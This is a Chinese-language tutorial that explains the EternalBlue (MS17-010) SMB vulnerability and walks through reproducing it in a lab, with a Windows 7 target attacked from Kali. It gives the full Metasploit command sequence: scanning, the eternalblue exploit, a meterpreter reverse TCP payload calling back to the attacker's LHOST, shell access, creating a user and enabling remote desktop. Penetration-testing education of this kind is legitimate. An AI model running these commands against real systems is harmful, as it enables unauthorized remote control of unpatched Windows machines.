什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
漏洞名称:“永恒之蓝”漏洞
漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148
漏洞类型:缓冲区溢出漏洞
漏洞影响:信息泄露

什么是SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

SMB工作原理

  1. 首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
  2. 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
  3. 当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
  4. 连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

漏洞原理

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
补充:
“445端口是TCP共享服务 445端口它将尝试同时连接到端口139和445。如果端口445有响应,它将向端口139发送TCPRST数据包,以断开并继续与端口455的通信;当端口445没有响应时,使用端口139。”
“139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘可能是最常见的问题。139属于TCP协议。”

影响版本

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

ms17-010漏洞复现

复现环境

  • 靶机:Windows 7
  • 攻击机:Kali
  • 工具:namap(这里主要用于漏洞扫描,也可以使用nussus等其他工具、metasploit(msf)

工具

Metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

使用方法

  • 进入框架:msfconsole
    
  • 使用search命令查找相关漏洞: search  ms17-010
    
  • 使用use进入模块:  use exploit/windows/smb/ms17_010_eternalblue
    
  • 使用info查看模块信息: info
    
  • 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
    
  • 查看模块需要配置的参数:show options
    
  • 设置参数:set  RHOST  192.168.125.138
    
  • 攻击:exploit /  run
    
  • 后渗透阶段
    

复现过程

查找主机

nmap -O 192.168.139.*

进入MSF框架,搜索ms17-010漏洞

命令:msfconsole
search ms17-010
扫描后获得两个工具
auxiliary/scanner/smb/smb_ms17_010
永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
exploit/windows/smb/ms17_010_eternalblue
永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

使用ms17-010扫描模块,对靶机进行扫描

该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。

命令: use auxiliary/scanner/smb/smb_ms17_010

查看模块需要的配置参数

命令:show options
右边Required为yes的选项说明左边 Current Setting 这个项对应的需要填写,比如Rhosts

设置攻击目标

RHOSTS 参数是要探测主机的ip或ip范围(比如 192.168.125.125-192.168.125.140 或者 192.168.1.0/24)

设置目标主机

命令:set rhosts 192.168.139.133

执行扫描

命令:run
图中带[+]符号表示该主机192.168.139.133存在此漏洞(正是我们的靶机win7)

使用ms17-010攻击模块,对靶机进行攻击

命令:use exploit/windows/smb/ms17_010_eternalblue

查看这个漏洞的信息

命令:info

查看可攻击的系统平台

命令:show targets
这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统
注:有些其他的漏洞模块对操作系统的语言和版本要求的很严,比如MS08_067,这样就要我们指定目标系统的版本的。如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)

查看攻击核载

命令:show payloads
该命令可以查看当前漏洞利用模块下可用的所有Payload
攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令

设置攻击载荷

命令:set payload windows/x64/meterpreter/reverse_tcp

查看配置参数

命令:show options

设置目标攻击ip

命令:set rhosts 192.168.139.133 (如果有多个攻击目标 ip间直接用空格隔开即可)

设置用于接受从目标机弹回的shell

命令:set LHOST 192.168.139.129

执行攻击

命令:run
运行了exploit命令之后,我们开启了一个reverse TCP监听器来监听本地的 4444 端口,即我(攻击者)的本地主机地址(LHOST)和端口号(LPORT)。运行成功之后,我们将会看到命令提示符 meterpreter > 出现

进入与退出终端

进入shell

命令:shell

退出shell 命令:exit
解决乱码 命令:chcp 65001

从 meterpreter 退出到MSF框架 命令:background

查看我们获得的shell 命令:sessions -l

进入我们所获得的的shell 命令:sessions -i 1

创建用户

命令:run post/windows/manage/enable_rdp USERNAME=qyx PASSWORD=1234

启动远程连接桌面

命令:run post/windows/manage/enable_rdp
输入前:

输入后:

ms17-010 永恒之蓝相关推荐

  1. 永恒之蓝(ms17-010)简介与复现

    一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  2. 永恒之蓝漏洞利用攻击以及修复方法

    靶机:Windows 7(有的版本有补丁) 攻击机:Kali 2021 首先保证可以互相ping 通 32位系统进去控制台会蓝屏 漏洞利用 用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进 ...

  3. 永恒之蓝MS17-010

    永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了"明星".在过去的五 ...

  4. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  5. CVE-2017-0144 EternalBlue(永恒之蓝)漏洞分析

    前言 EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry ...

  6. 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币

    WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...

  7. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  8. 永恒之蓝漏洞原理 445_新代码漏洞“永恒之黑”该如何警惕?

    中科天齐公司是在中科院计算技术研究所的大力推动下,以中科院计算所国际领先的自主研究成果"软件代码漏洞检测修复平台(Wukong悟空)"为基础组建的高新技术企业. 北京时间3月12日 ...

  9. MS17-010(永恒之蓝)漏洞分析与复现

    文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...

  10. 翻版“永恒之蓝”入侵手机 信息安全再临大考

    近日,一款模仿"永恒之蓝"的新型手机病毒开始肆虐,该手机病毒冒充"王者荣耀"辅助外挂软件诱导用户下载安装,进而对手机中的个人文件进行加密,并向用户索要赎金.移动 ...

最新文章

  1. colab中的变量怎么读取_Fizyr Retinanet在Colab中进行目标检测
  2. WS2812串行可控彩色LED灯珠
  3. 文件系统磁盘管理(七)--RAID
  4. Centos 6.2部署CSVN服务器
  5. ITK:修剪二进制图像
  6. rstudio 导出结果_RStudio如何完美导出包含中文的图
  7. springboot 多数据源mybatis的两种整合方法
  8. 如何利用FFT(基2时间以及基2频率)信号流图求序列的DFT
  9. this指针不全等于对象地址
  10. c语言算法基础第一例
  11. mybatis传统方式开发DAO
  12. 模板匹配之zernike矩
  13. 【优化分类】基于matlab改进的人工蜂群算法优化SVM分类【含Matlab源码 1833期】
  14. 安卓root之后交管123123 20秒闪退和中国农业银行app 6.0闪退的解决方法
  15. 【校园网环境下知网研学下载文献出现“下载文献 当前IP没有获取权限或服务器异常”处理办法】
  16. Karabiner Elements for Mac(键盘改键神器)
  17. HTML5 新增的结构元素——能用不代表用对了
  18. 【Echarts】关于关闭点击地图时显示黄色的方法
  19. 一篇值得收藏的ML数据预处理原理与实践文章
  20. 分享FUJITSU铁电存储器FRAM 2MBit SPI MB85RS2MTA

热门文章

  1. 美国爱达荷州劳工部系统遭黑 超17万人求职数据被盗
  2. ISC互联网安全大会
  3. #快捷键# 大学四年我常用的软件快捷键大全,教你成为电脑高手!!
  4. 公网使用微软的RD Client访问内网下的windows主机
  5. 北航计算机系男女比例,北航男女比例(北京航空航天大学的男女比例怎么样)
  6. 【总结整理】javascript进阶学习(慕课网)
  7. flink solt和并行度
  8. 电路板维修测试仪如何使用?
  9. js判断浏览器是否为IE浏览器
  10. JProfiler11使用教程之JVM调优